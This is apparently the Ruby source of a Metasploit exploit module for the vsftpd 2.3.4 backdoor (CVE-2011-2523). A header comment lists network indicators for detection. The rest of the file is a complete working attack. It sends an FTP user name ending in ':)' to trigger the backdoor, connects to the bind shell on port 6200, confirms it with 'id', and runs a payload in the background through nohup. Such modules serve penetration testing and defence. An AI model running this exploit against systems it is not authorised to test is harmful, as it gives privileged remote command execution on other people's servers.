GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/exploits/unix/ftp/vsftpd_234_backdoor.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
# Metasploit module for CVE-2011-2523, the backdoor that shipped in the
# tampered vsftpd-2.3.4.tar.gz download archive.
#
# Network behaviour visible in this file, useful when writing detections:
# * the FTP login sent to RPORT (default 21) uses a random user name that ends
#   in the two characters ":)";
# * a separate TCP connection to port 6200 is then attempted and is treated as
#   a shell when it answers "id" with text containing "uid=".
#
# An FTP USER value ending in ":)", or an unexpected listener on TCP 6200 of an
# FTP server, is therefore worth alerting on. The metadata below marks the
# resulting access as privileged, so a host found running a build from the
# tampered archive should be rebuilt from a verified copy of the source.
class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::Tcp

  # Registers the module metadata and the default FTP port (21).
  #
  # @param info [Hash] metadata merged into the defaults through update_info
  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'VSFTPD v2.3.4 Backdoor Command Execution',
        'Description' => %q{
          This module exploits a malicious backdoor that was added to the VSFTPD download
          archive. This backdoor was introduced into the vsftpd-2.3.4.tar.gz archive between
          June 30th 2011 and July 1st 2011 according to the most recent information
          available. This backdoor was removed on July 3rd 2011.
        },
        'Author' => [ 'hdm', 'MC' ],
        'License' => MSF_LICENSE,
        'References' => [
          [ 'CVE', '2011-2523' ],
          [ 'OSVDB', '73573'],
          [ 'URL', 'http://pastebin.com/AetT9sS5'],
          [ 'URL', 'http://scarybeastsecurity.blogspot.com/2011/07/alert-vsftpd-download-backdoored.html' ],
        ],
        'Privileged' => true,
        'Platform' => [ 'unix' ],
        'Arch' => ARCH_CMD,
        'Payload' => {
          'Space' => 2000,
          'BadChars' => '',
          'DisableNops' => true,
          'Compat' => {
            'PayloadType' => 'cmd_interact',
            'ConnectionType' => 'find'
          }
        },
        'Targets' => [
          [ 'Automatic', {} ],
        ],
        'DisclosureDate' => '2011-07-03',
        'DefaultTarget' => 0,
        'Notes' => {
          'Reliability' => UNKNOWN_RELIABILITY,
          'Stability' => UNKNOWN_STABILITY,
          'SideEffects' => UNKNOWN_SIDE_EFFECTS
        }
      )
    )

    register_options([ Opt::RPORT(21) ])
  end

  # Runs the module: probes TCP 6200, and if nothing answers there performs the
  # FTP USER/PASS exchange on RPORT before probing 6200 a second time.
  #
  # Every failure path only prints a message and disconnects; nothing is raised
  # to the caller.
  def exploit
    # A listener may already be present on the backdoor port; any connection
    # error is swallowed and simply means "not open".
    existing = begin
      connect(false, { 'RPORT' => 6200 })
    rescue StandardError
      nil
    end

    if existing
      print_status('The port used by the backdoor bind listener is already open')
      handle_backdoor(existing)
      return
    end

    # Nothing on 6200 yet, so talk to the FTP service itself.
    connect

    greeting = sock.get_once(-1, 30).to_s
    print_status("Banner: #{greeting.strip}")

    # The user name is random apart from the trailing ":)" sequence.
    user_name = rand_text_alphanumeric(rand(6) + 1)
    sock.put("USER #{user_name}:)\r\n")
    resp = sock.get_once(-1, 30).to_s
    print_status("USER: #{resp.strip}")

    # 530 means the server refuses named logins; anything other than a 331
    # password prompt is treated as an unexpected reply.
    rejection =
      if resp =~ /^530 /
        'This server is configured for anonymous only and the backdoor code cannot be reached'
      elsif resp !~ /^331 /
        "This server did not respond as expected: #{resp.strip}"
      end

    if rejection
      print_error(rejection)
      disconnect
      return
    end

    sock.put("PASS #{rand_text_alphanumeric(rand(6) + 1)}\r\n")

    # The PASS reply is deliberately not read; the module goes straight to
    # probing port 6200 again.
    spawned = begin
      connect(false, { 'RPORT' => 6200 })
    rescue StandardError
      nil
    end

    if spawned
      print_good('Backdoor service has been spawned, handling...')
      handle_backdoor(spawned)
      nil
    else
      disconnect
    end
  end

  # Confirms that the service behind the given socket behaves like a shell and,
  # if so, hands the socket to the payload handler.
  #
  # @param s [Object] socket returned by the connect call to port 6200
  def handle_backdoor(s)
    s.put("id\n")

    # A shell is expected to answer "id" with a line containing "uid=".
    reply = s.get_once(-1, 5).to_s
    unless reply =~ /uid=/
      print_error('The service on port 6200 does not appear to be a shell')
      disconnect(s)
      return
    end

    print_good("UID: #{reply.strip}")

    # Note that no trailing newline is appended to this command string.
    command = 'nohup ' + payload.encoded + ' >/dev/null 2>&1'
    s.put(command)
    handler(s)
  end
end